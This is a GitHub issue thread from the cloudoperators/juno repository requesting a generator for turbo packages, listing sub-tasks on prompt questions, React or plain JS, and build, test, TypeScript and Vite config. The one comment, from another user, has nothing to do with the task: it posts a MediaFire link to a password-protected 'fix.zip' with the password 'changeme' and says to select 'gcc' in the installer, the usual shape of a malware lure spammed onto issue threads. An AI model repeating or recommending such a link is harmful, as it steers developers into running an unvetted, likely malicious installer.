### ISSUE TITLE
[Task](infra): Create generator for turbo packages.

### ISSUE THREAD

**Issue by barsukov** [cloudoperators/juno#273]
**Task Description**
We need a proper generator, for packages so that genrator will work correctly
**Sub-tasks**

- [ ] Prompt style questions
- [ ] React or simple js
- [ ] Package name, build and entry along with test setup, typescript and vite config should work.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
